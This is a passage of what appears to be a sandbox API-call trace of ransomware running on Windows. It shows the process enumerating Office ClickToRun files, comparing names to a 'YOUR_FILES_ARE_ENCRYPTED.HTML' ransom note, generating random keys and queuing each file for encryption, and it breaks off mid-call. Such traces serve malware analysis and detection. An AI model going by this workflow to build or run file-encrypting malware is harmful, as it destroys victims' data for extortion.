lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0155.412] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, 
ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.412] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x97377710, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x97377710, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 1 [0155.412] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned 146 [0155.412] GetProcessHeap () returned 0x270000 [0155.412] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7410060 [0155.413] lstrcpyW (in: lpString1=0x7410060, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}" [0155.413] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*" [0155.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x97377710, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x97377710, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0155.415] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x97377710, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x97377710, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.415] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x96c515d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="DeploymentConfiguration.xml", cAlternateFileName="DEPLOY~1.XML")) returned 1 [0155.415] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml") returned 174 [0155.415] lstrcmpW (lpString1="DeploymentConfiguration.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.415] PathFindExtensionW (pszPath="DeploymentConfiguration.xml") returned=".xml" [0155.415] lstrlenW (lpString=".xml") returned 4 [0155.415] PathFindExtensionW (pszPath="DeploymentConfiguration.xml") returned=".xml" [0155.415] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0155.415] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0155.416] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=614) returned 1 [0155.416] GetProcessHeap () returned 0x270000 [0155.416] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x745b1e0 [0155.419] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="DE") returned 2 [0155.419] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="AF") returned 2 [0155.419] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="24") returned 2 [0155.419] wsprintfW (in: 
param_1=0x4ebce12, param_2="%02X" | out: param_1="BC") returned 2 [0155.419] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="DA") returned 2 [0155.419] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="1C") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="26") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="BB") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="18") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="09") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="5B") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="D1") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="5D") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="D8") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="9C") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="02") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="A0") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="2E") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="CD") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="1C") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="2A") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="80") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="22") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="FC") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="47") returned 2 
[0155.420] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="56") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="15") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="F6") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="A6") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="54") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="C8") returned 2 [0155.420] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="5E") returned 2 [0155.421] lstrcpyW (in: lpString1=0x746b294, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" [0155.421] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x745b1e0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.421] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x745b1e0, lpOverlapped=0x745b1e0) returned 1 [0155.425] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f9afd70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2f9afd70, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2fa482f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, 
nFileSizeHigh=0x0, nFileSizeLow=0x4ad286, dwReserved0=0x0, dwReserved1=0x60, cFileName="Manifest.xml", cAlternateFileName="")) returned 1 [0155.430] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml") returned 159 [0155.430] lstrcmpW (lpString1="Manifest.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.430] PathFindExtensionW (pszPath="Manifest.xml") returned=".xml" [0155.430] lstrlenW (lpString=".xml") returned 4 [0155.430] PathFindExtensionW (pszPath="Manifest.xml") returned=".xml" [0155.430] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0155.430] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0155.431] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=4903558) returned 1 [0155.431] GetProcessHeap () returned 0x270000 [0155.431] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x745b1e0 [0155.432] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="08") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="D5") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="4B") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: 
param_1="76") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="EA") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="F5") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="6A") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="DF") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="03") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="02") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="F1") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="E5") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="0A") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="E3") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="67") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="71") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="09") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="5D") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="6B") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="4F") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="12") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="8C") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="A5") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="64") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="E0") returned 2 [0155.433] wsprintfW (in: 
param_1=0x4ebce6a, param_2="%02X" | out: param_1="90") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="45") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="D6") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="35") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="9F") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="4E") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="2C") returned 2 [0155.434] lstrcpyW (in: lpString1=0x746b294, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" [0155.434] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x745b1e0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.434] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x745b1e0, lpOverlapped=0x745b1e0) returned 1 [0155.761] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3149d650, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3149d650, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x96c515d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="UserDeploymentConfiguration.xml", cAlternateFileName="USERDE~1.XML")) returned 1 [0155.761] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml") returned 178 [0155.761] lstrcmpW (lpString1="UserDeploymentConfiguration.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.761] PathFindExtensionW (pszPath="UserDeploymentConfiguration.xml") returned=".xml" [0155.761] lstrlenW (lpString=".xml") returned 4 [0155.761] PathFindExtensionW (pszPath="UserDeploymentConfiguration.xml") returned=".xml" [0155.761] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0155.762] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0155.762] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=614) returned 1 [0155.762] GetProcessHeap () returned 0x270000 [0155.762] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x745b1e0 [0155.763] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="88") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="66") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="1B") returned 2 [0155.763] 
wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="F3") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="45") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="C7") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="6E") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="09") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="AF") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="0B") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="34") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="C5") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="F4") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="B2") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="4A") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="6C") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="67") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="18") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="2A") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="64") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="B9") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="D1") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="A7") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="F7") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: 
param_1="B3") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="A0") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="B1") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="E0") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="D5") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="D4") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="DF") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="3F") returned 2 [0155.765] lstrcpyW (in: lpString1=0x746b294, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" [0155.765] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x745b1e0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.765] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x745b1e0, lpOverlapped=0x745b1e0) returned 1 [0155.766] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xa1fe50b0, 
ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x2ef2ef, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserManifest.xml", cAlternateFileName="USERMA~1.XML")) returned 1 [0155.766] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml") returned 163 [0155.767] lstrcmpW (lpString1="UserManifest.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.767] PathFindExtensionW (pszPath="UserManifest.xml") returned=".xml" [0155.767] lstrlenW (lpString=".xml") returned 4 [0155.768] PathFindExtensionW (pszPath="UserManifest.xml") returned=".xml" [0155.771] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0155.776] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0155.777] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=3076847) returned 1 [0155.777] GetProcessHeap () returned 0x270000 [0155.777] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x745b1e0 [0155.778] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="12") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="AE") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="B7") 
returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="37") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="F5") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="3D") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="F5") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="20") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="6D") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="67") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="A8") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="8F") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="C3") returned 2 [0155.778] wsprintfW (in: 